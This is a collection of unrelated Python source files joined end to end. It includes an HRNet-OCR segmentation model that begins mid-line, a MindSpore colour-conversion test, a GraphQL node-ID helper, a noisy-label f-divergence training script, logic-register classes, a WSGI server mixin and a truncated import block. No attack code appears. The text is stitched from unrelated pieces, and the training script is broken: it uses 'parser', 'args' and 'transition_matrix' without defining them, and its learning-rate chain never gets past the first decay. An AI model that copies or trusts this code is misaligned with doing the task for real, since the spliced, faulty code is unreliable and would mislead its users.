feats.shape[3])) # feats = tf.transpose(feats, [0, 2, 1]) # batch, h*w, c probs = K.softmax(scale * probs, axis=2) # batch, k, h*w # ocr_context = tf.expand_dims(tf.transpose(tf.matmul(probs, feats), [0, 2, 1]), axis=3) ocr_context = tf.expand_dims(tf.matmul(probs, feats), axis=2) return ocr_context def SpatialOCR_Module(feats, proxy_feats, key_chan, out_chan, scale=1, dropout=0.1): batch_size, h, w, c = feats.get_shape().as_list() if scale > 1: feats = MaxPool2D((scale, scale)) # f_pixel query = Conv2D(key_chan, 1, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(feats) query = BatchNormalization(axis=3)(query) query = Activation('relu')(query) query = Conv2D(key_chan, 1, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(query) query = BatchNormalization(axis=3)(query) query = Activation('relu')(query) query = tf.reshape(query, [batch_size, -1, key_chan]) # batch, h*w, chan # f_object key = Conv2D(key_chan, 1, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(proxy_feats) key = BatchNormalization(axis=3)(key) key = Activation('relu')(key) key = Conv2D(key_chan, 1, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(key) key = BatchNormalization(axis=3)(key) key = Activation('relu')(key) key = tf.transpose(tf.reshape(key, [batch_size, -1, key_chan]), (0, 2, 1)) # f_down value = Conv2D(key_chan, 1, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(proxy_feats) value = BatchNormalization(axis=3)(value) value = Activation('relu')(value) value = tf.reshape(value, [batch_size, -1, key_chan]) sim_map = tf.matmul(query, key) sim_map = (key_chan ** -.5) * sim_map sim_map = K.softmax(sim_map, axis=-1) # add bg context context = tf.matmul(sim_map, value) context = tf.reshape(context, [batch_size, tf.shape(feats)[1], tf.shape(feats)[2], key_chan]) # f_up context = Conv2D(key_chan, 1, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(context) context = BatchNormalization(axis=3)(context) context = Activation('relu')(context) if scale > 1: context = UpSampling2D(size=(scale, scale), interpolation='bilinear')(context) output = concatenate([context, feats], axis=-1) output = Conv2D(out_chan, 1, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(output) output = BatchNormalization(axis=3)(output) output = Activation('relu')(output) output = Dropout(dropout)(output) return output def ocr_module(x, classes=1, activation='sigmoid'): x0 = x[0] x1 = tf.compat.v1.image.resize_bilinear(x[1], [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x2 = tf.compat.v1.image.resize_bilinear(x[2], [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x3 = tf.compat.v1.image.resize_bilinear(x[3], [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) feats = concatenate([x0, x1, x2, x3], axis=-1) out_aux = Conv2D(feats.shape[3], 1, 1, padding='same', use_bias=True, kernel_initializer='he_normal')(feats) out_aux = BatchNormalization(axis=3)(out_aux) out_aux = Activation('relu')(out_aux) out_aux = Conv2D(classes, 1, 1, padding='same', use_bias=True, kernel_initializer='he_normal')(out_aux) feats = Conv2D(512, 3, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(feats) feats = BatchNormalization()(feats) feats = Activation('relu')(feats) context = spatial_gather_module(feats, out_aux, scale=1) feats = SpatialOCR_Module(feats, context, key_chan=256, out_chan=512, scale=1, dropout=0.05) out = Conv2D(classes, 1, 1, padding='same', kernel_initializer='he_normal')(feats) if 
activation in {'softmax', 'sigmoid'}: out_aux = Activation(activation)(out_aux) out = Activation(activation)(out) return out_aux, out def seg_hrnet_ocr(batch_size, height, width, channel, classes, activation='softmax', hrnet_type='hrnet_w48'): if hrnet_type == 'hrnet_w18': size = [18, 36, 72, 144] elif hrnet_type == 'hrnet_w32': size = [32, 64, 128, 256] elif hrnet_type == 'hrnet_w48': size = [48, 96, 192, 384] else: raise ValueError("Unsupported hrnet type!") inputs = Input(batch_shape=(batch_size,) + (height, width, channel)) x = stem_net(inputs) x = transition_layer1(x, size[:2]) for i in range(1): x = make_branch1(x, size[:2]) x = fuse_layer1(x, size[:2]) x = transition_layer2(x, size[:3]) for i in range(4): x = make_branch2(x, size[:3]) x = fuse_layer2(x, size[:3]) x = transition_layer3(x, size) for i in range(3): x = make_branch3(x, size) x = fuse_layer3(x, size) out_aux, out = ocr_module(x, classes=classes, activation=activation) model = Model(inputs=inputs, outputs=(out, out_aux)) return model if __name__ == "__main__": from tensorflow.keras.utils import plot_model import os os.environ["PATH"] += os.pathsep + 'C:/Program Files/Graphviz 2.44.1/bin/' model1 = seg_hrnet_ocr(batch_size=2, height=512, width=512, channel=3, classes=19, hrnet_type='hrnet_w48') model1.summary() plot_model(model1, to_file='./seg_hrnet.png', show_shapes=True)httpsgithu/mindsporetests/ut/python/dataset/test_convertcolor.py # Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """ Testing ConvertColor op in DE """ import cv2 import mindspore.dataset as ds import mindspore.dataset.vision.transforms as c_vision import mindspore.dataset.vision.utils as mode from mindspore import log as logger from util import visualize_image, diff_mse DATA_DIR = ["../data/dataset/test_tf_file_3_images/train-0000-of-0001.data"] SCHEMA_DIR = "../data/dataset/test_tf_file_3_images/datasetSchema.json" IMAGE_FILE = "../data/dataset/apple.jpg" def convert_color(ms_convert, cv_convert, plot=False): """ ConvertColor with different mode. 
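    Runs ConvertColor(ms_convert) in a MindSpore dataset pipeline, converts the
    same decoded images with cv2.cvtColor(cv_convert), and asserts that the MSE
    between the two results is 0. Set plot=True to visualize the original image
    together with both converted outputs.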
""" # First dataset dataset1 = ds.TFRecordDataset(DATA_DIR, SCHEMA_DIR, shuffle=False) decode_op = c_vision.Decode() convertcolor_op = c_vision.ConvertColor(ms_convert) dataset1 = dataset1.map(operations=decode_op, input_columns=["image"]) dataset1 = dataset1.map(operations=convertcolor_op, input_columns=["image"]) # Second dataset dataset2 = ds.TFRecordDataset(DATA_DIR, SCHEMA_DIR, columns_list=["image"], shuffle=False) dataset2 = dataset2.map(operations=decode_op, input_columns=["image"]) num_iter = 0 for data1, data2 in zip(dataset1.create_dict_iterator(num_epochs=1, output_numpy=True), dataset2.create_dict_iterator(num_epochs=1, output_numpy=True)): if num_iter > 0: break convertcolor_ms = data1["image"] original = data2["image"] convertcolor_cv = cv2.cvtColor(original, cv_convert) mse = diff_mse(convertcolor_ms, convertcolor_cv) logger.info("convertcolor_{}, mse: {}".format(num_iter + 1, mse)) assert mse == 0 num_iter += 1 if plot: visualize_image(original, convertcolor_ms, mse, convertcolor_cv) def test_convertcolor_pipeline(plot=False): """ Test ConvertColor of transforms """ logger.info("test_convertcolor_pipeline") convert_color(mode.ConvertMode.COLOR_BGR2GRAY, cv2.COLOR_BGR2GRAY, plot) convert_color(mode.ConvertMode.COLOR_BGR2RGB, cv2.COLOR_BGR2RGB, plot) convert_color(mode.ConvertMode.COLOR_BGR2BGRA, cv2.COLOR_BGR2BGRA, plot) def test_convertcolor_eager(): """ Test ConvertColor with eager mode """ logger.info("test_convertcolor") img = cv2.imread(IMAGE_FILE) img_ms = c_vision.ConvertColor(mode.ConvertMode.COLOR_BGR2GRAY)(img) img_expect = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) mse = diff_mse(img_ms, img_expect) assert mse == 0 if __name__ == "__main__": test_convertcolor_pipeline(plot=False) test_convertcolor_eager() from __future__ import annotations import json import typing from nebulo.gql.alias import Field, InterfaceType, NonNull, ScalarType from nebulo.sql.inspect import get_primary_key_columns, get_table_name from nebulo.sql.statement_helpers import literal_string from nebulo.text_utils.base64 import from_base64, to_base64 from sqlalchemy import func from sqlalchemy.sql.selectable import Alias class NodeIdStructure(typing.NamedTuple): table_name: str values: typing.Dict[str, typing.Any] @classmethod def from_dict(cls, contents: typing.Dict) -> NodeIdStructure: res = cls(table_name=contents["table_name"], values=contents["values"]) return res def to_dict(self) -> typing.Dict[str, typing.Any]: return {"table_name": self.table_name, "values": self.values} def serialize(self) -> str: ser = to_base64(json.dumps(self.to_dict())) return ser @classmethod def deserialize(cls, serialized: str) -> NodeIdStructure: contents = json.loads(from_base64(serialized)) return cls.from_dict(contents) def serialize(value: typing.Union[NodeIdStructure, typing.Dict]): node_id = NodeIdStructure.from_dict(value) if isinstance(value, dict) else value return node_id.serialize() def to_node_id_sql(sqla_model, query_elem: Alias): table_name = get_table_name(sqla_model) pkey_cols = get_primary_key_columns(sqla_model) # Columns selected from query element vals = [] for col in pkey_cols: col_name = str(col.name) vals.extend([literal_string(col_name), query_elem.c[col_name]]) return func.jsonb_build_object( literal_string("table_name"), literal_string(table_name), literal_string("values"), func.jsonb_build_object(*vals), ) ID = ScalarType( "ID", description="Unique ID for node", serialize=serialize, parse_value=NodeIdStructure.deserialize, parse_literal=lambda x: NodeIdStructure.deserialize(x.value), ) 
NodeInterface = InterfaceType( "NodeInterface", description="An object with a nodeId", fields={"nodeId": Field(NonNull(ID), description="The global id of the object.", resolve=None)}, # Maybe not necessary resolve_type=lambda *args, **kwargs: None, ) #bool ''' a or not b and c == (a or ((not b) and c)) ''' ans = input("What flavor do you want [vanilla]:") if ans != "": flavor = ans else: flavor = "vanilla" if ans: flavor = ans else: flavor = "vanilla" flavor = ans or "vanilla" flavor = input("What flavor do you want [vanilla]:") or "vanilla"weijiaheng/Robust-f-divergence-measures # Import libraries import numpy as np import os import csv import math import torch.nn.parallel import pickle import argparse from tqdm import tqdm from noise_data_mnist import * import torch import torch.nn as nn import torch.optim import torch.utils.data import torchvision import torch.nn as nn import torch.nn.functional as F from torch.nn import init from torch.autograd import Variable torch.autograd.set_detect_anomaly(True) num_classes = 10 num_epochs = 150 CUDA = True if torch.cuda.is_available() else False Tensor = torch.cuda.FloatTensor if CUDA else torch.FloatTensor CE = nn.CrossEntropyLoss().cuda() opt = parser.parse_args() # Stable version of CE Loss class CrossEntropyLossStable(nn.Module): def __init__(self, reduction='mean', eps=1e-5): super(CrossEntropyLossStable, self).__init__() self._name = "Stable Cross Entropy Loss" self._eps = eps self._softmax = nn.Softmax(dim=-1) self._nllloss = nn.NLLLoss(reduction=reduction) def forward(self, outputs, labels): return self._nllloss( torch.log( self._softmax(outputs) + self._eps ), labels ) criterion = CrossEntropyLossStable() criterion.cuda() # Divergence functions: div = opt.divergence if div == 'KL': def activation(x): return -torch.mean(x) def conjugate(x): return -torch.mean(torch.exp(x - 1.)) elif div == 'Reverse-KL': def activation(x): return -torch.mean(-torch.exp(x)) def conjugate(x): return -torch.mean(-1. - x) # remove log elif div == 'Jeffrey': def activation(x): return -torch.mean(x) def conjugate(x): return -torch.mean(x + torch.mul(x, x) / 4. + torch.mul(torch.mul(x, x), x) / 16.) elif div == 'Squared-Hellinger': def activation(x): return -torch.mean(1. - torch.exp(x)) def conjugate(x): return -torch.mean((1. - torch.exp(x)) / (torch.exp(x))) elif div == 'Pearson': def activation(x): return -torch.mean(x) def conjugate(x): return -torch.mean(torch.mul(x, x) / 4. + x) elif div == 'Neyman': def activation(x): return -torch.mean(1. - torch.exp(x)) def conjugate(x): return -torch.mean(2. - 2. * torch.sqrt(1. - x)) elif div == 'Jenson-Shannon': def activation(x): return -torch.mean(- torch.log(1. + torch.exp(-x))) - torch.log(torch.tensor(2.)) def conjugate(x): return -torch.mean(x + torch.log(1. + torch.exp(-x))) + torch.log(torch.tensor(2.)) elif div == 'Total-Variation': def activation(x): return -torch.mean(torch.tanh(x) / 2.) def conjugate(x): return -torch.mean(torch.tanh(x) / 2.) 
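# Note on the branches above: each pair implements the two terms of the
# variational lower bound D_f(P || Q) >= E_{Z~P}[g(Z)] - E_{Z~Q}[f*(g(Z))].
# As the comments in train() below spell out, P is the joint distribution of
# the classifier output and the noisy label and Q is the product of their
# marginals (approximated with peer samples); `activation` returns the negated
# first term and `conjugate` the negated second term, so minimizing
# loss_regular - loss_peer maximizes the divergence estimate.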
else: raise NotImplementedError("[-] Not Implemented f-divergence %s" % div) # Stable PROB: returns the negative predicted probability of an image given a reference label class ProbLossStable(nn.Module): def __init__(self, reduction='none', eps=1e-5): super(ProbLossStable, self).__init__() self._name = "Prob Loss" self._eps = eps self._softmax = nn.Softmax(dim=-1) self._nllloss = nn.NLLLoss(reduction='none') def forward(self, outputs, labels): return self._nllloss( self._softmax(outputs), labels ) criterion_prob = ProbLossStable() criterion_prob.cuda() # Training def train(train_loader, peer_loader, model, optimizer, epoch): model.train() peer_iter = iter(peer_loader) for i, (idx, input, target) in enumerate(train_loader): if idx.size(0) != batch_size: continue warmup_epoch = args.warmup input = torch.autograd.Variable(input.cuda()) target = torch.autograd.Variable(target.cuda()) output = model(input) optimizer.zero_grad() # After warm-up epochs, switch to optimizing f-divergence functions if epoch >= warmup_epoch: # Estimate E_Z [g(Z)] where Z follows the joint distribution of h, noisy Y; # g is the activation function prob_reg = -criterion_prob(output, target) loss_regular = activation(prob_reg) # Bias correction of uniform noise case for the activation term for k in range(10): target_tmp = target * 0. + k if k == 9: loss_regular -= transition_matrix[0][9] * activation(-criterion_prob(output, target_tmp.long())) else: loss_regular -= transition_matrix[k + 1][k] * activation(-criterion_prob(output, target_tmp.long())) #Estimate E_Z [f^*(g(Z))] where Z follows the product of marginal distributions of h, noisy Y; # f^*(g) is the conjugate function; input1 = peer_iter.next()[1] input1 = torch.autograd.Variable(input1.cuda()) output1 = model(input1) target2 = torch.randint(0, 10, (target.shape)).cuda() prob_peer = -criterion_prob(output1, target2) loss_peer = conjugate(prob_peer) # Bias correction of uniform noise case for the conjugate term for k in range(10): target_tmp = target2 * 0. + k if k == 9: loss_peer -= transition_matrix[0][9] * conjugate(-criterion_prob(output1, target_tmp.long())) else: loss_peer -= transition_matrix[k + 1][k] * conjugate(-criterion_prob(output1, target_tmp.long())) loss = loss_regular - loss_peer # Use CE loss for the warm-up. else: loss = criterion(output, target) loss.cuda() loss.backward() optimizer.step() # Calculate accuracy def test(model, test_loader): model.eval() correct = 0 total = 0 for i, (idx, input, target) in enumerate(test_loader): input = torch.Tensor(input).cuda() target = torch.autograd.Variable(target).cuda() total += target.size(0) output = model(input) _, predicted = torch.max(output.detach(), 1) correct += predicted.eq(target).sum().item() accuracy = 100. * correct / total return accuracy # Calculate f-divergence value in the max game def f_calculate(model, data_loader, peer_loader): model.eval() f_score = 0 peer_iter = iter(peer_loader) for i, (idx, input, target) in enumerate(data_loader): if idx.size(0) != batch_size: continue input = torch.autograd.Variable(input.cuda()) target = torch.autograd.Variable(target.cuda()) output = model(input) prob_reg = -criterion_prob(output.detach(), target) loss_regular = activation(prob_reg) for k in range(10): target_tmp = target * 0. 
+ k if k == 9: loss_regular -= transition_matrix[0][9] * activation(-criterion_prob(output.detach(), target_tmp.long())) else: loss_regular -= transition_matrix[k + 1][k] * activation(-criterion_prob(output.detach(), target_tmp.long())) input1 = peer_iter.next()[1] input1 = torch.autograd.Variable(input1.cuda()) output1 = model(input1) target2 = torch.randint(0, 10, (target.shape)).cuda() prob_peer = -criterion_prob(output1.detach(), target2) loss_peer = conjugate(prob_peer) for k in range(10): target_tmp = target2 * 0. + k if k == 9: loss_peer -= transition_matrix[0][9] * conjugate(-criterion_prob(output1.detach(), target_tmp.long())) else: loss_peer -= transition_matrix[k + 1][k] * conjugate(-criterion_prob(output1.detach(), target_tmp.long())) score = loss_peer - loss_regular f_score += score * target.size(0) return f_score/10000 def main(writer): model_prob = CNNModel().cuda() best_prob_acc = 0 max_f = -100 val_acc_noisy_result = [] train_acc_result = [] test_acc_result = [] f_result = [] f_test_result = [] # Dataloader for peer samples, which is used for the estimation of the marginal distribution peer_train = peer_data_train(batch_size=args.batchsize, img_size=(32, 32)) peer_val = peer_data_val(batch_size=args.batchsize, img_size=(32, 32)) peer_test = peer_data_test(batch_size=args.batchsize, img_size=(32, 32)) for epoch in range(num_epochs): print("epoch=", epoch,'r=', args.r) learning_rate = 1e-3 if epoch > 20: learning_rate = 5e-4 elif epoch > 40: learning_rate = 1e-4 elif epoch > 60: learning_rate = 5e-5 elif epoch > 80: learning_rate = 1e-5 elif epoch > 100: learning_rate = 5e-6 elif epoch > 120: learning_rate = 1e-6 elif epoch > 140: learning_rate = 5e-7 optimizer_prob = torch.optim.Adam(model_prob.parameters(), lr=learning_rate) train(train_loader=train_loader_noisy, peer_loader = peer_train, model=model_prob, optimizer=optimizer_prob, epoch=epoch) print("validating model_prob...") # Training acc is calculated via noisy training data train_acc = test(model=model_prob, test_loader=train_loader_noisy) train_acc_result.append(train_acc) print('train_acc=', train_acc) # Validation acc is calculated via noisy validation data valid_acc = test(model=model_prob, test_loader=valid_loader_noisy) val_acc_noisy_result.append(valid_acc) print('valid_acc_noise=', valid_acc) # Calculate test accuracy test_acc = test(model=model_prob, test_loader=test_loader_) test_acc_result.append(test_acc) print('test_acc=', test_acc) f_div_value = f_calculate(model_prob, valid_loader_noisy, peer_val) f_result.append(f_div_value) print('f_div_value=', f_div_value) f_test = f_calculate(model_prob, test_loader_, peer_test) f_test_result.append(f_test) print('f_test_value=', f_test) # Best model is selected by referring to f-div value; the larger, the better! 
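        # (f_div_value comes from f_calculate on the noisy validation set, so
        # checkpointing is driven by the divergence estimate rather than by
        # accuracy measured against noisy validation labels.)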
if f_div_value >= max_f: max_f = f_div_value torch.save(model_prob, './trained_models/BIAS_UNIFORM' + str(args.r) + '_' + str(args.s) + '_' + str(args.divergence) + '_' + str(args.warmup)) print("saved, f-div value increases.") writer.writerow([epoch, train_acc, valid_acc, test_acc, f_div_value, f_test]) def evaluate(path): model = torch.load(path) test_acc = test(model=model, test_loader=test_loader_) print('test_acc=', test_acc) if __name__ == '__main__': # Save statistics print("Begin:") writer1 = csv.writer(open(f'BIAS_UNIFORM_result_{r}_{div}_{args.warmup}.csv','w')) writer1.writerow(['Epoch', 'Training Acc', f'Val_Noisy_Acc', 'Test_ACC', 'f_div', 'f_test']) main(writer1) evaluate('./trained_models/BIAS_UNIFORM' + str(args.r) + '_' + str(args.s) + '_' + str(args.divergence) + '_' + str(args.warmup)) print("Traning finished") leveltwo/maze/base/__init__.py from .maze import Maze from .base import Viewport from .playable import MazePlayable from .editable import MazeEditable """ The following classes are defined: Register4 Register8 Register16 """ from .. import wire from .. import signal from . import FLOP Wire = wire.Wire Bus4 = wire.Bus4 Bus8 = wire.Bus8 Bus16 = wire.Bus16 class Register4: """Construct a new 4-bit storage register. Args: data_bus: An object of type Bus4. The data input to the register. enable: An object of type Wire. Enables the register. clock: An object of type Wire or Clock. The clock input to the register. output_bus: An object of type Bus4. The output of the register. Takes on the value of data_bus on the positive edges of clock if the value of enable is 1. Raises: TypeError: If either data_bus or output_bus is not a bus of width 4. """ def __init__(self, data_bus, enable, clock, output_bus): if len(data_bus) != 4: raise TypeError( "Expected bus of width 4, received bus of width {0}.".format( len(data_bus) ) ) if len(output_bus) != 4: raise TypeError( "Expected bus of width 4, received bus of width {0}.".format( len(output_bus) ) ) not_1 = Wire() not_2 = Wire() not_3 = Wire() not_4 = Wire() mux_bus = Bus4() _Multiplexer2To1_4(enable, data_bus, output_bus, mux_bus) FLOP.DFlipFlop(mux_bus[0], clock, output_bus[0], not_1) FLOP.DFlipFlop(mux_bus[1], clock, output_bus[1], not_2) FLOP.DFlipFlop(mux_bus[2], clock, output_bus[2], not_3) FLOP.DFlipFlop(mux_bus[3], clock, output_bus[3], not_4) self.data_bus = data_bus self.enable = enable self.clock = clock self.output_bus = output_bus def __str__(self): str_ = "" str_ += "data_bus: " + self.data_bus.__str__() + "\n" str_ += "enable: " + str(self.enable.value) + "\n" str_ += "clock: " + str(self.clock.value) + "\n" str_ += "output_bus: " + self.output_bus.__str__() return str_ def __call__( self, *, data_bus=None, enable=None, clock=None, output_bus=None ): if data_bus is not None: self.data_bus.wire_values = data_bus if enable is not None: self.enable.value = enable if clock is not None: self.clock.value = clock if output_bus is not None: self.output_bus.wire_values = output_bus class Register8: """Construct a new 8-bit storage register. Args: data_bus: An object of type Bus8. The data input to the register. enable: An object of type Wire. Enables the register. clock: An object of type Wire or Clock. The clock input to the register. output_bus: An object of type Bus8. The output of the register. Takes on the value of data_bus on the positive edges of clock if the value of enable is 1. Raises: TypeError: If either data_bus or output_bus is not a bus of width 8. 
""" def __init__(self, data_bus, enable, clock, output_bus): if len(data_bus) != 8: raise TypeError( "Expected bus of width 8, received bus of width {0}.".format( len(data_bus) ) ) if len(output_bus) != 8: raise TypeError( "Expected bus of width 8, received bus of width {0}.".format( len(output_bus) ) ) not_1 = Wire() not_2 = Wire() not_3 = Wire() not_4 = Wire() not_5 = Wire() not_6 = Wire() not_7 = Wire() not_8 = Wire() mux_bus = Bus8() _Multiplexer2To1_8(enable, data_bus, output_bus, mux_bus) FLOP.DFlipFlop(mux_bus[0], clock, output_bus[0], not_1) FLOP.DFlipFlop(mux_bus[1], clock, output_bus[1], not_2) FLOP.DFlipFlop(mux_bus[2], clock, output_bus[2], not_3) FLOP.DFlipFlop(mux_bus[3], clock, output_bus[3], not_4) FLOP.DFlipFlop(mux_bus[4], clock, output_bus[4], not_5) FLOP.DFlipFlop(mux_bus[5], clock, output_bus[5], not_6) FLOP.DFlipFlop(mux_bus[6], clock, output_bus[6], not_7) FLOP.DFlipFlop(mux_bus[7], clock, output_bus[7], not_8) self.data_bus = data_bus self.enable = enable self.clock = clock self.output_bus = output_bus def __str__(self): str_ = "" str_ += "data_bus: " + self.data_bus.__str__() + "\n" str_ += "enable: " + str(self.enable.value) + "\n" str_ += "clock: " + str(self.clock.value) + "\n" str_ += "output_bus: " + self.output_bus.__str__() return str_ def __call__( self, *, data_bus=None, enable=None, clock=None, output_bus=None ): if data_bus is not None: self.data_bus.wire_values = data_bus if enable is not None: self.enable.value = enable if clock is not None: self.clock.value = clock if output_bus is not None: self.output_bus.wire_values = output_bus class Register16: """Construct a new 16-bit storage register. Args: data_bus: An object of type Bus16. The data input to the register. enable: An object of type Wire. Enables the register. clock: An object of type Wire or Clock. The clock input to the register. output_bus: An object of type Bus16. The output of the register. Takes on the value of data_bus on the positive edges of clock if the value of enable is 1. Raises: TypeError: If either data_bus or output_bus is not a bus of width 16. 
""" def __init__(self, data_bus, enable, clock, output_bus): if len(data_bus) != 16: raise TypeError( "Expected bus of width 16, received bus of width {0}.".format( len(data_bus) ) ) if len(output_bus) != 16: raise TypeError( "Expected bus of width 16, received bus of width {0}.".format( len(output_bus) ) ) not_1 = Wire() not_2 = Wire() not_3 = Wire() not_4 = Wire() not_5 = Wire() not_6 = Wire() not_7 = Wire() not_8 = Wire() not_9 = Wire() not_10 = Wire() not_11 = Wire() not_12 = Wire() not_13 = Wire() not_14 = Wire() not_15 = Wire() not_16 = Wire() mux_bus = Bus16() _Multiplexer2To1_16(enable, data_bus, output_bus, mux_bus) FLOP.DFlipFlop(mux_bus[0], clock, output_bus[0], not_1) FLOP.DFlipFlop(mux_bus[1], clock, output_bus[1], not_2) FLOP.DFlipFlop(mux_bus[2], clock, output_bus[2], not_3) FLOP.DFlipFlop(mux_bus[3], clock, output_bus[3], not_4) FLOP.DFlipFlop(mux_bus[4], clock, output_bus[4], not_5) FLOP.DFlipFlop(mux_bus[5], clock, output_bus[5], not_6) FLOP.DFlipFlop(mux_bus[6], clock, output_bus[6], not_7) FLOP.DFlipFlop(mux_bus[7], clock, output_bus[7], not_8) FLOP.DFlipFlop(mux_bus[8], clock, output_bus[8], not_9) FLOP.DFlipFlop(mux_bus[9], clock, output_bus[9], not_10) FLOP.DFlipFlop(mux_bus[10], clock, output_bus[10], not_11) FLOP.DFlipFlop(mux_bus[11], clock, output_bus[11], not_12) FLOP.DFlipFlop(mux_bus[12], clock, output_bus[12], not_13) FLOP.DFlipFlop(mux_bus[13], clock, output_bus[13], not_14) FLOP.DFlipFlop(mux_bus[14], clock, output_bus[14], not_15) FLOP.DFlipFlop(mux_bus[15], clock, output_bus[15], not_16) self.data_bus = data_bus self.enable = enable self.clock = clock self.output_bus = output_bus def __str__(self): str_ = "" str_ += "data_bus: " + self.data_bus.__str__() + "\n" str_ += "enable: " + str(self.enable.value) + "\n" str_ += "clock: " + str(self.clock.value) + "\n" str_ += "output_bus: " + self.output_bus.__str__() return str_ def __call__( self, *, data_bus=None, enable=None, clock=None, output_bus=None ): if data_bus is not None: self.data_bus.wire_values = data_bus if enable is not None: self.enable.value = enable if clock is not None: self.clock.value = clock if output_bus is not None: self.output_bus.wire_values = output_bus class _Multiplexer2To1_4: """ This is an internal module for Register4. It multiplexes two 4-bit inputs to a single 4-bit output. """ def __init__( self, select, input_1_bus, input_2_bus, output_bus ): vcc = Wire() vcc.value = 1 signal.Multiplexer2To1( vcc, select, input_1_bus[0], input_2_bus[0], output_bus[0] ) signal.Multiplexer2To1( vcc, select, input_1_bus[1], input_2_bus[1], output_bus[1] ) signal.Multiplexer2To1( vcc, select, input_1_bus[2], input_2_bus[2], output_bus[2] ) signal.Multiplexer2To1( vcc, select, input_1_bus[3], input_2_bus[3], output_bus[3] ) class _Multiplexer2To1_8: """ This is an internal module for Register8. It multiplexes two 8-bit inputs to a single 8-bit output. 
""" def __init__( self, select, input_1_bus, input_2_bus, output_bus ): vcc = Wire() vcc.value = 1 signal.Multiplexer2To1( vcc, select, input_1_bus[0], input_2_bus[0], output_bus[0] ) signal.Multiplexer2To1( vcc, select, input_1_bus[1], input_2_bus[1], output_bus[1] ) signal.Multiplexer2To1( vcc, select, input_1_bus[2], input_2_bus[2], output_bus[2] ) signal.Multiplexer2To1( vcc, select, input_1_bus[3], input_2_bus[3], output_bus[3] ) signal.Multiplexer2To1( vcc, select, input_1_bus[4], input_2_bus[4], output_bus[4] ) signal.Multiplexer2To1( vcc, select, input_1_bus[5], input_2_bus[5], output_bus[5] ) signal.Multiplexer2To1( vcc, select, input_1_bus[6], input_2_bus[6], output_bus[6] ) signal.Multiplexer2To1( vcc, select, input_1_bus[7], input_2_bus[7], output_bus[7] ) class _Multiplexer2To1_16: """ This is an internal module for Register16. It multiplexes two 16-bit inputs to a single 16-bit output. """ def __init__( self, select, input_1_bus, input_2_bus, output_bus ): vcc = Wire() vcc.value = 1 signal.Multiplexer2To1( vcc, select, input_1_bus[0], input_2_bus[0], output_bus[0] ) signal.Multiplexer2To1( vcc, select, input_1_bus[1], input_2_bus[1], output_bus[1] ) signal.Multiplexer2To1( vcc, select, input_1_bus[2], input_2_bus[2], output_bus[2] ) signal.Multiplexer2To1( vcc, select, input_1_bus[3], input_2_bus[3], output_bus[3] ) signal.Multiplexer2To1( vcc, select, input_1_bus[4], input_2_bus[4], output_bus[4] ) signal.Multiplexer2To1( vcc, select, input_1_bus[5], input_2_bus[5], output_bus[5] ) signal.Multiplexer2To1( vcc, select, input_1_bus[6], input_2_bus[6], output_bus[6] ) signal.Multiplexer2To1( vcc, select, input_1_bus[7], input_2_bus[7], output_bus[7] ) signal.Multiplexer2To1( vcc, select, input_1_bus[8], input_2_bus[8], output_bus[8] ) signal.Multiplexer2To1( vcc, select, input_1_bus[9], input_2_bus[9], output_bus[9] ) signal.Multiplexer2To1( vcc, select, input_1_bus[10], input_2_bus[10], output_bus[10] ) signal.Multiplexer2To1( vcc, select, input_1_bus[11], input_2_bus[11], output_bus[11] ) signal.Multiplexer2To1( vcc, select, input_1_bus[12], input_2_bus[12], output_bus[12] ) signal.Multiplexer2To1( vcc, select, input_1_bus[13], input_2_bus[13], output_bus[13] ) signal.Multiplexer2To1( vcc, select, input_1_bus[14], input_2_bus[14], output_bus[14] ) signal.Multiplexer2To1( vcc, select, input_1_bus[15], input_2_bus[15], output_bus[15] ) andreyfedoseev/LearningRegistry10-100 from Server import ThreadedServer, ForkingServer import traceback class WSGIMixIn: def handle(self, req): environ = req.environ environ['wsgi.input'] = req.stdin environ['wsgi.errors'] = req.stderr environ.update(self._environ) if environ.get('HTTPS','off') in ('on','1'): environ['wsgi.url_scheme'] = 'https' else: environ['wsgi.url_scheme'] = 'http' headers_set = [] headers_sent = [] def write(data): if not headers_set: raise AssertionError("write() before start_response()") elif not headers_sent: # Before the first output, send the stored headers status, response_headers = headers_sent[:] = headers_set req.stdout.write('Status: %s\r\n' % status) for header in response_headers: req.stdout.write('%s: %s\r\n' % header) req.stdout.write('\r\n') req.stdout.write(data) req.stdout.flush() def start_response(status, response_headers, exc_info=None): if exc_info: try: if headers_sent: # Re-raise original exception if headers sent raise exc_info[0], exc_info[1], exc_info[2] finally: exc_info = None # avoid dangling circular ref elif headers_set: raise AssertionError("Headers already set!") headers_set[:] = 
[status,response_headers] return write result = self._app(environ, start_response) try: for data in result: if data: # don't send headers until body appears write(data) if not headers_sent: write('') # send headers now if body was empty finally: if hasattr(result,'close'): result.close() def error(self, req, e): traceback.print_exc(file=req.stderr) req.stderr.flush() class ThreadedWSGIServer(WSGIMixIn, ThreadedServer): _environ = { 'wsgi.version': (1,0), 'wsgi.multithread': True, 'wsgi.multiprocess': True, 'wsgi.run_once': False } def __init__(self, app, workers=5): ThreadedServer.__init__(self, workers) self._app = app class ForkingWSGIServer(WSGIMixIn, ForkingServer): _environ = { 'wsgi.version': (1,0), 'wsgi.multithread': False, 'wsgi.multiprocess': True, 'wsgi.run_once': False } def __init__(self, app, workers=5): ForkingServer.__init__(self, workers) self._app = app # stdlib import secrets from typing import List from typing import Type from typing import Union from datetime import datetime # third party from nacl.signing import VerifyKey from nacl.encoding import HexEncoder from nacl.signing import SigningKey # syft relative from syft.core.node.abstract.node import AbstractNode from syft.core.node.common.service.auth import service_auth from syft.core.node.common.service.node_service import ImmediateNodeServiceWithReply from 